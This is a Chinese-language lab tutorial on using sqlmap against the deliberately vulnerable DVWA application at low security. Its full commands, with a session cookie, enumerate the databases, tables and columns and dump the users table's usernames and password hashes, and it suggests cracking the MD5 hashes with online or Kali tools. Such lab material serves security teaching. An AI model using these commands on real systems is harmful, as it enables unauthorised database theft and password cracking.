SQL 注入(利用sqlmap)——低安全性
【前言】
上次使用的手工注入,有一定的代码审计。那么对于这种存在sql注入漏洞的,哪必定可以使用sqlmap来进行sql注入。
由于我们的DVWA是要登录上去才可以进行里面相应的一些服务。
那么我们就要获取到浏览器中的cookie。
【准备工作】
- 登录DVWA,选择SQL Injection,按F12进入调试页面中的网络模块。
- 点击Submit,寻找注入点与所需要的cookie。
- 所需要的信息:
cookie与注入点
【使用sqlmap】
【爆破所有数据库】
sqlmap -u "http://192.168.188.201/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie "low; PHPSESSID=q0u7iggdkgo9lmdso9kslc9a72; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada" --dbs
【爆破当前(dvwa)数据库中的所有表】
sqlmap -u "http://192.168.188.201/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie "low; PHPSESSID=q0u7iggdkgo9lmdso9kslc9a72; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada" -D dvwa --tables
【爆破数据表中的所有字段】
sqlmap -u "http://192.168.188.201/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie "low; PHPSESSID=q0u7iggdkgo9lmdso9kslc9a72; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada" -D dvwa -T users --columns
【dump出指定字段】
从上一个步骤中我们通过列名就可以很清楚的看出敏感信息——user、password
sqlmap -u "http://192.168.188.201/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie "low; PHPSESSID=q0u7iggdkgo9lmdso9kslc9a72; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada" -D dvwa -T users -C user,password --dump
【MD5解密】
可以使用网上工具也可以使用kali自带工具。